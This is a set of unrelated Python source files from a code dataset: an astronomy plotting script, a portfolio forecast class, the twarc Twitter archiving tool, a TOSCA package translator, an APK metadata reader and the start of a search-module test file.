calculate}$'+'\\n'+r'$\\partial(\\mathbf{\\Omega},\\boldsymbol{\\theta})/\\partial (\\mathbf{x},\\mathbf{v}), \\mathrm{the\\ mean\\ stream\\ track\\ in}\\ (\\mathbf{\\Omega},\\boldsymbol{\\theta})^\\dagger,$'+'\\n'+r'$\\mathrm{and\\ estimate\\ the\\ spread\\ around\\ the\\ track}.$',size=16.)\n bovy_plot.bovy_plot([-0.9,sdf._thetasTrack[1]+progAngle],\n [22.185,mOs[1]+0.03],\n 'k:',overplot=True)\n bovy_plot.bovy_plot([-0.9,progAngle+sdf._thetasTrack[1]],\n [22.185,mOs[1]],\n 'k:',overplot=True)\n bovy_plot.bovy_text(-0.18,22.265,r'$\\mathrm{stream\\ track\\ +\\ spread}$',\n size=16.,\n rotation=-20.)\n bovy_plot.bovy_end_print(plotfilename1)\n #Now plot Z,X\n bovy_plot.bovy_print(fig_width=8.25,fig_height=3.5)\n pyplot.figure()\n sdf.plotTrack(d1='z',d2='x',interp=True,\n color='k',spread=2,overplot=True,lw=1.5,\n scaleToPhysical=True)\n sdf.plotTrack(d1='z',d2='x',interp=False,marker='o',ms=8.,color='k',\n overplot=True,ls='none',\n scaleToPhysical=True)\n sdf.plotProgenitor(d1='z',d2='x',color='k',\n overplot=True,ls='--',lw=1.5,dashes=(20,10),\n scaleToPhysical=True)\n pyplot.plot(sdf._progenitor.z(sdf._trackts)*8.,\n sdf._progenitor.x(sdf._trackts)*8.,marker='o',ms=6.,\n ls='none',\n color='k')\n pyplot.xlim(8.,-3.)\n pyplot.ylim(12.,15.5)\n bovy_plot._add_ticks()\n bovy_plot._add_axislabels(r'$Z\\,(\\mathrm{kpc})$',r'$X\\,(\\mathrm{kpc})$')\n bovy_plot.bovy_text(0.,14.25,r'$\\mathrm{auxiliary\\ orbit}$',\n size=16.,rotation=-20.)\n bovy_plot.bovy_text(1.,13.78,r'$\\mathrm{stream\\ track\\ +\\ spread}$',\n size=16.,rotation=-25.)\n bovy_plot.bovy_text(7.5,14.2,r\"$\\mathrm{At\\ these\\ points, we\\ calculate\\ the\\ stream\\ position\\ in}\\ 
(\\mathbf{x},\\mathbf{v})\\ \\mathrm{from}$\"+\n '\\n'+r\"$\\mathrm{the\\ auxiliary's}\\ (\\mathbf{x}_a,\\mathbf{v}_a) = (\\mathbf{\\Omega}_a,\\boldsymbol{\\theta}_a), \\mathrm{the\\ mean\\ offset} (\\Delta \\mathbf{\\Omega},\\Delta \\boldsymbol{\\theta}),$\"+'\\n'+\n r\"$\\mathrm{and}\\ \\left(\\frac{\\partial(\\mathbf{\\Omega},\\boldsymbol{\\theta})}{\\partial (\\mathbf{x},\\mathbf{v})}\\right)^{-1 \\, \\dagger}.$\",\n size=16.)\n bovy_plot.bovy_plot([sdf._progenitor.z(sdf._trackts[1])*8.,4.5],\n [sdf._progenitor.x(sdf._trackts[1])*8.,14.8],\n 'k:',overplot=True)\n bovy_plot.bovy_text(5.6,12.4,r\"$\\mathrm{We\\ interpolate\\ the\\ track\\ between\\ the}$\"+'\\n'+r\"$\\mathrm{calculated\\ points\\ and\\ use\\ slerp\\ to}$\"+'\\n'+r\"$\\mathrm{interpolate\\ the\\ estimated\\ 6D\\ spread.}$\",\n size=16.)\n bovy_plot.bovy_plot([3.,sdf._interpolatedObsTrackXY[500,2]*8.],\n [13.3,sdf._interpolatedObsTrackXY[500,0]*8.],\n 'k:',overplot=True)\n bovy_plot.bovy_end_print(plotfilename2)\n #Finally plot l vs. d\n bovy_plot.bovy_print(fig_width=8.25,fig_height=3.5)\n pyplot.figure()\n sdf.plotTrack(d1='ll',d2='dist',interp=True,\n color='k',spread=2,overplot=True,lw=1.5)\n sdf.plotTrack(d1='ll',d2='dist',interp=False,marker='o',ms=8.,color='k',\n overplot=True,ls='none')\n sdf.plotProgenitor(d1='ll',d2='dist',color='k',dashes=(20,10),\n overplot=True,ls='--',lw=1.5)\n pyplot.plot(sdf._progenitor.ll(sdf._trackts,\n obs=[sdf._R0,0.,sdf._Zsun],ro=sdf._Rnorm),\n sdf._progenitor.dist(sdf._trackts,\n obs=[sdf._R0,0.,sdf._Zsun],ro=sdf._Rnorm),\n marker='o',ms=6.,\n ls='none',\n color='k')\n pyplot.xlim(157.,260.)\n pyplot.ylim(7.4,15.5)\n bovy_plot._add_ticks()\n bovy_plot._add_axislabels(r'$\\mathrm{Galactic\\ longitude\\, (deg)}$',\n r'$\\mathrm{distance\\, (kpc)}$')\n bovy_plot.bovy_text(165.,13.5,r\"$\\mathrm{Finally, the\\ interpolated\\ track\\ in}\\ (\\mathbf{x},\\mathbf{v})\\ \\mathrm{is}$\"+'\\n'+r\"$\\mathrm{converted\\ to\\ observable\\ quantities\\ (here}, l\\ \\mathrm{and}\\ D).$\",\n size=16.)\n bovy_plot.bovy_plot([230.,sdf._interpolatedObsTrackLB[850,0]],\n [13.25,sdf._interpolatedObsTrackLB[850,2]],\n 'k:',overplot=True)\n bovy_plot.bovy_text(170.,9.4,r\"$\\mathrm{The\\ estimated\\ spread\\ is\\ propagated}$\"+'\\n'+r\"$\\mathrm{at\\ the\\ points\\ directly\\ from}\\ (\\mathbf{\\Omega},\\boldsymbol{\\theta})\\ \\mathrm{to}$\"+'\\n'+r\"$(l,b,D,\\ldots)\\ \\mathrm{and\\ interpolated}$\"+'\\n'+r\"$\\mathrm{using\\ slerp}.$\",\n size=16.)\n bovy_plot.bovy_plot([195.,sdf._ObsTrackLB[1,0]],\n [9.7,sdf._ObsTrackLB[1,2]],\n 'k:',overplot=True)\n bovy_plot.bovy_end_print(plotfilename3)\n return None\n\nif __name__ == '__main__':\n illustrate_track(sys.argv[1],sys.argv[2],sys.argv[3])\n","sub_path":"py/illustrate_track.py","file_name":"illustrate_track.py","file_ext":"py","file_size_in_byte":8972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"641757597","text":"\"\"\"Представление прогноза.\"\"\"\nimport dataclasses\n\nimport numpy as np\nimport pandas as pd\n\nfrom poptimizer.dl.ledoit_wolf import ledoit_wolf_cor\n\n\n@dataclasses.dataclass\nclass Forecast:\n \"\"\"Прогноз доходности и ковариации.\"\"\"\n\n tickers: tuple[str, ...]\n date: pd.Timestamp\n history_days: int\n mean: pd.Series\n std: pd.Series\n cov: np.array = dataclasses.field(init=False)\n cor: float = dataclasses.field(init=False)\n shrinkage: float = dataclasses.field(init=False)\n\n def __post_init__(self):\n sigma, self.cor, self.shrinkage = ledoit_wolf_cor(self.tickers, 
self.date, self.history_days)\n std = self.std.values\n self.cov = std.reshape(1, -1) * sigma * std.reshape(-1, 1)\n","sub_path":"poptimizer/dl/forecast.py","file_name":"forecast.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"607245218","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport fileinput\nimport os\nimport sys\nimport json\nimport time\nimport logging\nimport argparse\nimport datetime\nimport requests\n\nfrom requests_oauthlib import OAuth1Session\n\ntry:\n import configparser # Python 3\nexcept ImportError:\n import ConfigParser as configparser # Python 2\n\nif sys.version_info[:2] <= (2, 7):\n # Python 2\n get_input = raw_input\nelse:\n # Python 3\n get_input = input\n\n# Also in setup.py\n__version__ = '0.7.0'\n\n\ndef geo(value):\n return '-74,40,-73,41'\n\n\ndef main():\n \"\"\"\n The twarc command line.\n \"\"\"\n parser = argparse.ArgumentParser(\"twarc\")\n parser.add_argument('-v', '--version', action='version',\n version='%(prog)s {version}'.format(\n version=__version__))\n parser.add_argument(\"--search\", dest=\"search\",\n help=\"search for tweets matching a query\")\n parser.add_argument(\"--max_id\", dest=\"max_id\",\n help=\"maximum tweet id to search for\")\n parser.add_argument(\"--since_id\", dest=\"since_id\",\n help=\"smallest id to search for\")\n parser.add_argument(\"--result_type\", dest=\"result_type\",\n choices=[\"mixed\", \"recent\", \"popular\"],\n default=\"recent\", help=\"search result type\")\n parser.add_argument(\"--lang\", dest=\"lang\",\n help=\"limit to ISO 639-1 language code\"),\n parser.add_argument(\"--track\", dest=\"track\",\n help=\"stream tweets matching track filter\")\n parser.add_argument(\"--follow\", dest=\"follow\",\n help=\"stream tweets from user ids\")\n parser.add_argument(\"--locations\", dest=\"locations\",\n help=\"stream tweets from a particular location\")\n parser.add_argument(\"--sample\", action=\"store_true\",\n help=\"stream sample live tweets\")\n parser.add_argument(\"--timeline\", dest=\"timeline\",\n help=\"get user timeline for a screen name\")\n parser.add_argument(\"--timeline_user_id\", dest=\"timeline_user_id\",\n help=\"get user timeline for a user id\")\n parser.add_argument(\"--lookup_screen_names\", dest=\"lookup_screen_names\",\n nargs='+', help=\"look up users by screen name; \\\n returns user objects\")\n parser.add_argument(\"--lookup_user_ids\", dest=\"lookup_user_ids\", nargs='+',\n help=\"look up users by user id; returns user objects\")\n parser.add_argument(\"--hydrate\", dest=\"hydrate\",\n help=\"rehydrate tweets from a file of tweet ids\")\n parser.add_argument(\"--log\", dest=\"log\",\n default=\"twarc.log\", help=\"log file\")\n parser.add_argument(\"--consumer_key\",\n default=None, help=\"Twitter API consumer key\")\n parser.add_argument(\"--consumer_secret\",\n default=None, help=\"Twitter API consumer secret\")\n parser.add_argument(\"--access_token\",\n default=None, help=\"Twitter API access key\")\n parser.add_argument(\"--access_token_secret\",\n default=None, help=\"Twitter API access token secret\")\n parser.add_argument('-c', '--config',\n default=default_config_filename(),\n help=\"Config file containing Twitter keys and secrets\")\n parser.add_argument('-p', '--profile', default='main',\n help=\"Name of a profile in your configuration file\")\n parser.add_argument('-w', '--warnings', action='store_true',\n help=\"Include warning messages in 
output\")\n\n args = parser.parse_args()\n\n logging.basicConfig(\n filename=args.log,\n level=logging.INFO,\n format=\"%(asctime)s %(levelname)s %(message)s\"\n )\n\n consumer_key = args.consumer_key or os.environ.get('CONSUMER_KEY')\n consumer_secret = args.consumer_secret or os.environ.get('CONSUMER_SECRET')\n access_token = args.access_token or os.environ.get('ACCESS_TOKEN')\n access_token_secret = args.access_token_secret or os.environ.get('ACCESS_TOKEN_SECRET')\n\n if not (consumer_key and consumer_secret and\n access_token and access_token_secret):\n credentials = load_config(args.config, args.profile)\n if credentials:\n consumer_key = credentials['consumer_key']\n consumer_secret = credentials['consumer_secret']\n access_token = credentials['access_token']\n access_token_secret = credentials['access_token_secret']\n else:\n print(\"Please enter Twitter authentication credentials\")\n consumer_key = get_input('consumer key: ')\n consumer_secret = get_input('consumer secret: ')\n access_token = get_input('access_token: ')\n access_token_secret = get_input('access token secret: ')\n save_keys(args.profile, consumer_key, consumer_secret,\n access_token, access_token_secret)\n\n t = Twarc(consumer_key=consumer_key,\n consumer_secret=consumer_secret,\n access_token=access_token,\n access_token_secret=access_token_secret)\n\n tweets = []\n users = []\n\n # Calls that return tweets\n if args.search:\n tweets = t.search(\n args.search,\n since_id=args.since_id,\n max_id=args.max_id,\n lang=args.lang,\n result_type=args.result_type,\n )\n elif args.track or args.follow or args.locations:\n tweets = t.filter(track=args.track, follow=args.follow,\n locations=args.locations)\n elif args.hydrate:\n f_names = [args.hydrate] if args.hydrate != '--hydrate' else None\n\n input_iterator = fileinput.FileInput(\n f_names,\n mode='rU',\n openhook=fileinput.hook_compressed,\n )\n\n tweets = t.hydrate(input_iterator)\n\n elif args.sample:\n tweets = t.sample()\n elif args.timeline:\n tweets = t.timeline(screen_name=args.timeline)\n elif args.timeline_user_id:\n tweets = t.timeline(user_id=args.timeline_user_id)\n\n # Calls that return user profile objects\n elif args.lookup_user_ids:\n users = t.user_lookup(user_ids=args.lookup_user_ids)\n elif args.lookup_screen_names:\n users = t.user_lookup(screen_names=args.lookup_screen_names)\n\n else:\n raise argparse.ArgumentTypeError(\n 'must supply one of: --search --track --follow --locations'\n ' --timeline --timeline_user_id'\n ' --lookup_screen_names --lookup_user_ids'\n ' --sample --hydrate')\n\n # iterate through the tweets and write them to stdout\n for tweet in tweets:\n # include warnings in output only if they asked for it\n if 'id_str' in tweet or args.warnings:\n print(json.dumps(tweet))\n\n # add some info to the log\n if 'id_str' in tweet:\n if 'user' in tweet:\n logging.info(\"archived https://twitter.com/%s/status/%s\",\n tweet['user']['screen_name'], tweet['id_str'])\n elif 'limit' in tweet:\n t = datetime.datetime.utcfromtimestamp(\n float(tweet['limit']['timestamp_ms']) / 1000)\n t = t.isoformat(\"T\") + \"Z\"\n logging.warn(\"%s tweets undelivered at %s\",\n tweet['limit']['track'], t)\n elif 'warning' in tweet:\n logging.warn(tweet['warning']['message'])\n else:\n logging.warn(json.dumps(tweet))\n\n # iterate through the user objects and write them to stdout\n for user in users:\n # include warnings in output only if they asked for it\n if 'id_str' in user or args.warnings:\n print(json.dumps(user))\n\n # add some info to the log\n if 
'screen_name' in user:\n logging.info(\"archived user profile for @%s / id_str=%s\",\n user['screen_name'], user['id_str'])\n else:\n logging.warn(json.dumps(user))\n\n\ndef load_config(filename, profile):\n if not os.path.isfile(filename):\n return None\n config = configparser.ConfigParser()\n config.read(filename)\n data = {}\n for key in ['access_token', 'access_token_secret',\n 'consumer_key', 'consumer_secret']:\n try:\n data[key] = config.get(profile, key)\n except configparser.NoSectionError:\n sys.exit(\"no such profile %s in %s\" % (profile, filename))\n except configparser.NoOptionError:\n sys.exit(\"missing %s from profile %s in %s\" % (\n key, profile, filename))\n return data\n\n\ndef save_config(filename, profile,\n consumer_key, consumer_secret,\n access_token, access_token_secret):\n config = configparser.ConfigParser()\n config.add_section(profile)\n config.set(profile, 'consumer_key', consumer_key)\n config.set(profile, 'consumer_secret', consumer_secret)\n config.set(profile, 'access_token', access_token)\n config.set(profile, 'access_token_secret', access_token_secret)\n with open(filename, 'w') as config_file:\n config.write(config_file)\n\n\ndef default_config_filename():\n \"\"\"\n Return the default filename for storing Twitter keys.\n \"\"\"\n home = os.path.expanduser(\"~\")\n return os.path.join(home, \".twarc\")\n\n\ndef save_keys(profile, consumer_key, consumer_secret,\n access_token, access_token_secret):\n \"\"\"\n Save keys to ~/.twarc\n \"\"\"\n filename = default_config_filename()\n save_config(filename, profile,\n consumer_key, consumer_secret,\n access_token, access_token_secret)\n print(\"Keys saved to\", filename)\n\n\ndef rate_limit(f):\n \"\"\"\n A decorator to handle rate limiting from the Twitter API. If\n a rate limit error is encountered we will sleep until we can\n issue the API call again.\n \"\"\"\n def new_f(*args, **kwargs):\n errors = 0\n while True:\n resp = f(*args, **kwargs)\n if resp.status_code == 200:\n errors = 0\n return resp\n elif resp.status_code == 429:\n reset = int(resp.headers['x-rate-limit-reset'])\n now = time.time()\n seconds = reset - now + 10\n if seconds < 1:\n seconds = 10\n logging.warn(\"rate limit exceeded: sleeping %s secs\", seconds)\n time.sleep(seconds)\n elif resp.status_code >= 500:\n errors += 1\n if errors > 30:\n logging.warn(\"too many errors from Twitter, giving up\")\n resp.raise_for_status()\n seconds = 60 * errors\n logging.warn(\"%s from Twitter API, sleeping %s\",\n resp.status_code, seconds)\n time.sleep(seconds)\n else:\n resp.raise_for_status()\n return new_f\n\n\ndef catch_conn_reset(f):\n \"\"\"\n A decorator to handle connection reset errors even ones from pyOpenSSL\n until https://github.com/edsu/twarc/issues/72 is resolved\n \"\"\"\n try:\n import OpenSSL\n ConnectionError = OpenSSL.SSL.SysCallError\n except:\n ConnectionError = requests.exceptions.ConnectionError\n\n def new_f(self, *args, **kwargs):\n try:\n return f(self, *args, **kwargs)\n except ConnectionError as e:\n logging.warn(\"caught connection error: %s\", e)\n self.connect()\n return f(self, *args, **kwargs)\n return new_f\n\n\ndef catch_timeout(f):\n \"\"\"\n A decorator to handle read timeouts from Twitter.\n \"\"\"\n def new_f(self, *args, **kwargs):\n try:\n return f(self, *args, **kwargs)\n except requests.exceptions.ReadTimeout as e:\n logging.warn(\"caught read timeout: %s\", e)\n self.connect()\n return f(self, *args, **kwargs)\n return new_f\n\ndef catch_gzip_errors(f):\n \"\"\"\n A decorator to handle gzip encoding 
errors which have been known to\n happen during hydration.\n \"\"\"\n def new_f(self, *args, **kwargs):\n try:\n return f(self, *args, **kwargs)\n except requests.exceptions.ContentDecodingError as e:\n logging.warn(\"caught gzip error: %s\", e)\n self.connect()\n return f(self, *args, **kwargs)\n return new_f\n\n\n\nclass Twarc(object):\n \"\"\"\n Your friendly neighborhood Twitter archiving class. Twarc allows\n you to search for existing tweets, stream live tweets that match\n a filter query and lookup (hdyrate) a list of tweet ids.\n\n Each method search, stream and hydrate returns a tweet iterator which\n allows you to do what you want with the data. Twarc handles rate limiting\n in the API, so it will go to sleep when Twitter tells it to, and wake back\n up when it is able to get more data from the API.\n \"\"\"\n\n def __init__(self, consumer_key, consumer_secret, access_token,\n access_token_secret):\n \"\"\"\n Instantiate a Twarc instance. Make sure your environment variables\n are set.\n \"\"\"\n\n self.consumer_key = consumer_key\n self.consumer_secret = consumer_secret\n self.access_token = access_token\n self.access_token_secret = access_token_secret\n self.client = None\n self.last_response = None\n self.connect()\n\n def search(self, q, max_id=None, since_id=None, lang=None,\n result_type='recent'):\n \"\"\"\n Pass in a query with optional max_id, min_id or lang and get\n back an iterator for decoded tweets. Defaults to recent (i.e.\n not mixed, the API default, or popular) tweets.\n \"\"\"\n logging.info(\"starting search for %s\", q)\n url = \"https://api.twitter.com/1.1/search/tweets.json\"\n params = {\n \"count\": 100,\n \"q\": q\n }\n if lang is not None:\n params['lang'] = lang\n if result_type in ['mixed', 'recent', 'popular']:\n params['result_type'] = result_type\n else:\n params['result_type'] = 'recent'\n\n while True:\n if since_id:\n params['since_id'] = since_id\n if max_id:\n params['max_id'] = max_id\n\n resp = self.get(url, params=params)\n statuses = resp.json()[\"statuses\"]\n\n if len(statuses) == 0:\n logging.info(\"no new tweets matching %s\", params)\n break\n\n for status in statuses:\n yield status\n\n max_id = str(int(status[\"id_str\"]) - 1)\n\n def timeline(self, user_id=None, screen_name=None, max_id=None,\n since_id=None):\n \"\"\"\n Returns a collection of the most recent tweets posted\n by the user indicated by the user_id or screen_name parameter.\n Provide a user_id or screen_name.\n \"\"\"\n # Strip if screen_name is prefixed with '@'\n if screen_name:\n screen_name = screen_name.lstrip('@')\n id = screen_name or user_id\n id_type = \"screen_name\" if screen_name else \"user_id\"\n logging.info(\"starting user timeline for user %s\", id)\n url = \"https://api.twitter.com/1.1/statuses/user_timeline.json\"\n params = {\"count\": 200, id_type: id}\n\n while True:\n if since_id:\n params['since_id'] = since_id\n if max_id:\n params['max_id'] = max_id\n\n try:\n resp = self.get(url, params=params, allow_404=True)\n except requests.exceptions.HTTPError as e:\n if e.response.status_code == 404:\n logging.info(\"no timeline available for %s\", id)\n break\n raise e\n\n statuses = resp.json()\n\n if len(statuses) == 0:\n logging.info(\"no new tweets matching %s\", params)\n break\n\n for status in statuses:\n # If you request an invalid user_id, you may still get\n # results so need to check.\n if not user_id or user_id == status.get(\"user\",\n {}).get(\"id_str\"):\n yield status\n\n max_id = str(int(status[\"id_str\"]) - 1)\n\n def 
user_lookup(self, screen_names=None, user_ids=None):\n \"\"\"\n Returns fully-hydrated user objects for a list of up to 100\n screen_names or user_ids. Provide screen_names or user_ids.\n \"\"\"\n # Strip if any screen names are prefixed with '@'\n if screen_names:\n screen_names = [s.lstrip('@') for s in screen_names]\n ids = screen_names or user_ids\n id_type = \"screen_name\" if screen_names else \"user_id\"\n while ids:\n ids_str = \",\".join(ids[:100])\n logging.info(\"Looking up users %s\", ids_str)\n url = 'https://api.twitter.com/1.1/users/lookup.json'\n params = {id_type: ids_str}\n try:\n resp = self.get(url, params=params, allow_404=True)\n except requests.exceptions.HTTPError as e:\n if e.response.status_code == 404:\n logging.info(\"no users matching %s\", ids_str)\n break\n raise e\n\n users = resp.json()\n for user in users:\n yield user\n\n ids = ids[100:]\n\n def filter(self, track=None, follow=None, locations=None):\n \"\"\"\n Returns an iterator for tweets that match a given filter track from\n the livestream of tweets happening right now.\n \"\"\"\n if locations is not None:\n if type(locations) == list:\n locations = ','.join(locations)\n locations = locations.replace('\\\\', '')\n\n url = 'https://stream.twitter.com/1.1/statuses/filter.json'\n params = {\"stall_warnings\": True}\n if track:\n params[\"track\"] = track\n if follow:\n params[\"follow\"] = follow\n if locations:\n params[\"locations\"] = locations\n headers = {'accept-encoding': 'deflate, gzip'}\n errors = 0\n while True:\n try:\n logging.info(\"connecting to filter stream for %s\", params)\n resp = self.post(url, params, headers=headers, stream=True)\n errors = 0\n for line in resp.iter_lines(chunk_size=512):\n if not line:\n logging.info(\"keep-alive\")\n continue\n try:\n yield json.loads(line.decode())\n except Exception as e:\n logging.error(\"json parse error: %s - %s\", e, line)\n except requests.exceptions.HTTPError as e:\n errors += 1\n logging.error(e)\n if e.response.status_code == 420:\n t = errors * 60\n logging.info(\"sleeping %s\", t)\n time.sleep(t)\n else:\n t = errors * 5\n logging.info(\"sleeping %s\", t)\n time.sleep(t)\n except Exception as e:\n errors += 1\n t = errors * 1\n logging.error(e)\n logging.info(\"sleeping %s\", t)\n time.sleep(t)\n\n def sample(self):\n \"\"\"\n Returns a small random sample of all public statuses. 
The Tweets\n returned by the default access level are the same, so if two different\n clients connect to this endpoint, they will see the same Tweets.\n \"\"\"\n url = 'https://stream.twitter.com/1.1/statuses/sample.json'\n params = {\"stall_warnings\": True}\n headers = {'accept-encoding': 'deflate, gzip'}\n errors = 0\n while True:\n try:\n logging.info(\"connecting to sample stream\")\n resp = self.post(url, params, headers=headers, stream=True)\n errors = 0\n for line in resp.iter_lines(chunk_size=512):\n if not line:\n logging.info(\"keep-alive\")\n continue\n try:\n yield json.loads(line.decode())\n except Exception as e:\n logging.error(\"json parse error: %s - %s\", e, line)\n except requests.exceptions.HTTPError as e:\n errors += 1\n logging.error(e)\n if e.response.status_code == 420:\n t = errors * 60\n logging.info(\"sleeping %s\", t)\n time.sleep(t)\n else:\n t = errors * 5\n logging.info(\"sleeping %s\", t)\n time.sleep(t)\n except Exception as e:\n errors += 1\n t = errors * 1\n logging.error(e)\n logging.info(\"sleeping %s\", t)\n time.sleep(t)\n\n def hydrate(self, iterator):\n \"\"\"\n Pass in an iterator of tweet ids and get back an iterator for the\n decoded JSON for each corresponding tweet.\n \"\"\"\n ids = []\n url = \"https://api.twitter.com/1.1/statuses/lookup.json\"\n\n # lookup 100 tweets at a time\n for tweet_id in iterator:\n tweet_id = tweet_id.strip() # remove new line if present\n ids.append(tweet_id)\n if len(ids) == 100:\n logging.info(\"hydrating %s ids\", len(ids))\n resp = self.post(url, data={\"id\": ','.join(ids)})\n tweets = resp.json()\n tweets.sort(key=lambda t: t['id_str'])\n for tweet in tweets:\n yield tweet\n ids = []\n\n # hydrate any remaining ones\n if len(ids) > 0:\n logging.info(\"hydrating %s\", ids)\n resp = self.post(url, data={\"id\": ','.join(ids)})\n for tweet in resp.json():\n yield tweet\n\n @rate_limit\n @catch_conn_reset\n @catch_timeout\n @catch_gzip_errors\n def get(self, *args, **kwargs):\n # Pass allow 404 to not retry on 404\n allow_404 = kwargs.pop('allow_404', False)\n try:\n r = self.last_response = self.client.get(*args, **kwargs)\n # this has been noticed, believe it or not\n # https://github.com/edsu/twarc/issues/75\n if r.status_code == 404 and not allow_404:\n logging.warn(\"404 from Twitter API! trying again\")\n time.sleep(1)\n r = self.get(*args, **kwargs)\n return r\n except requests.exceptions.ConnectionError as e:\n logging.error(\"caught connection error %s\", e)\n self.connect()\n return self.get(*args, **kwargs)\n\n @rate_limit\n @catch_conn_reset\n @catch_timeout\n @catch_gzip_errors\n def post(self, *args, **kwargs):\n try:\n self.last_response = self.client.post(*args, **kwargs)\n return self.last_response\n except requests.exceptions.ConnectionError as e:\n logging.error(\"caught connection error %s\", e)\n self.connect()\n return self.post(*args, **kwargs)\n\n def connect(self):\n \"\"\"\n Sets up the HTTP session to talk to Twitter. 
If one is active it is\n closed and another one is opened.\n \"\"\"\n if self.client:\n logging.info(\"closing existing http session\")\n self.client.close()\n if self.last_response:\n logging.info(\"closing last response\")\n self.last_response.close()\n logging.info(\"creating http session\")\n self.client = OAuth1Session(\n client_key=self.consumer_key,\n client_secret=self.consumer_secret,\n resource_owner_key=self.access_token,\n resource_owner_secret=self.access_token_secret\n )\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"twarc.py","file_name":"twarc.py","file_ext":"py","file_size_in_byte":24293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"167197898","text":"# Copyright 2016 RIFT.io Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport argparse\nimport logging\nimport logging.config\nimport os\nimport shutil\nimport tarfile\nimport tempfile\nimport zipfile\n\nimport rift.mano.tosca_translator.shell as shell\n\n\nclass ToscaPackage(object):\n\n SUPPORTED_INPUTS = (YAML, ZIP) = ('yaml', 'zip')\n FILE_EXTS = (ZIP, TARGZ) = ('.zip', '.tar.gz')\n\n def __init__(self, log, in_file, out_file=None):\n self.log = log\n self.in_file = os.path.abspath(os.path.normpath(in_file))\n if out_file:\n self.out_file = os.path.abspath(os.path.normpath(out_file))\n if zipfile.is_zipfile(in_file):\n if in_file.endswith(self.TARGZ):\n if out_file is None:\n self.out_file = self.in_file\n # Currently we store all the files uploaded\n # in lauchpad as tar.gz\n self.in_file = self.in_file.replace(self.TARGZ, self.ZIP)\n shutil.move(self.out_file, self.in_file)\n elif in_file.endswith(self.ZIP):\n if out_file is None:\n self.out_file = self.in_file.replace(self.ZIP, self.TARGZ)\n self.log.debug(\"Tosca file: {}, Output file: {}\".\n format(self.in_file, self.out_file))\n else:\n err_msg = \"{} is not a zip file.\".format(in_file)\n self.log.error(err_msg)\n raise ValueError(err_msg)\n\n def translate(self):\n try:\n out_file = None\n prevdir = os.getcwd()\n # Create a temp directory to generate the yang descriptors\n with tempfile.TemporaryDirectory() as tmpdirname:\n output_dir = tmpdirname+'/yang'\n tmpl_file = '--template-file='+self.in_file\n out_dir = '--output-dir='+output_dir\n trans_args = [tmpl_file, out_dir]\n self.log.debug(\"Calling tosca-translator with args:{}\".\n format(trans_args))\n shell.main(args=trans_args, log=self.log)\n\n # Get the list of translated files\n os.chdir(output_dir)\n flist = []\n for root, dirs, files in os.walk(output_dir):\n rel_dir = (root.replace(output_dir, '')).lstrip('/')\n for f in files:\n flist.append(os.path.join(rel_dir, f))\n self.log.debug(\"File list to archive: {}\".format(flist))\n\n # Generate a tar file with the output files\n with tarfile.open(self.out_file, 'w:gz') as tar:\n for f in flist:\n tar.add(f)\n out_file = self.out_file\n self.log.debug(\"Output file: {}\".format(out_file))\n except Exception as e:\n self.log.error(\"Error processing TOSCA file {}: {}\".\n 
format(self.in_file, e))\n self.log.exception(e)\n finally:\n os.chdir(prevdir)\n\n return out_file\n\n @staticmethod\n def is_tosca_package(in_file):\n if zipfile.is_zipfile(in_file):\n return True\n else:\n return False\n\n\ndef main(raw_args=None, log=None):\n parser = argparse.ArgumentParser(\n description='RIFT TOSCA translator for descriptors')\n parser.add_argument(\n \"-f\",\n \"--csar-file\",\n required=True,\n help=\"TOSCA CSAR file to translate\")\n parser.add_argument(\n \"-o\",\n \"--output-file\",\n help=\"Output filename\")\n parser.add_argument(\n \"--debug\",\n help=\"Enable debug logging\",\n action=\"store_true\")\n if raw_args:\n args = parser.parse_args(raw_args)\n else:\n args = parser.parse_args()\n\n if log is None:\n if args.debug:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.ERROR)\n log = logging.getLogger(\"tosca-translator\")\n\n return ToscaPackage(log, args.csar_file,\n out_file=args.output_file).translate()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"modules/core/mano/rwlaunchpad/plugins/rwlaunchpadtasklet/rift/tasklets/rwlaunchpad/tosca.py","file_name":"tosca.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"59802554","text":"import warnings\n\nfrom pyaxmlparser import APK\n\n\nfile = '/home/chillar/projects/android/apps/adbd-Insecure-v2.00.apk'\n\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n apk = APK(file)\n print(apk.package)\n","sub_path":"python/pyaxmlparser_exp.py","file_name":"pyaxmlparser_exp.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"107616364","text":"\"\"\"\ntest_search.py - tests for the search module\nauthor: mutantmonkey \n\"\"\"\nimport re\nimport unittest\nfrom mock import MagicMock\nfrom modules.search import google_search, gsearch, my_api_key, my_cse_id, \\\n bing_search, bing, duck_search, duck, search, suggest\nfrom tools import is_up\nfrom web import unquote\n\n\n# tests involving Google searches are expected to fail because Google's Web\n# Search API was officially deprecated in Nov. 
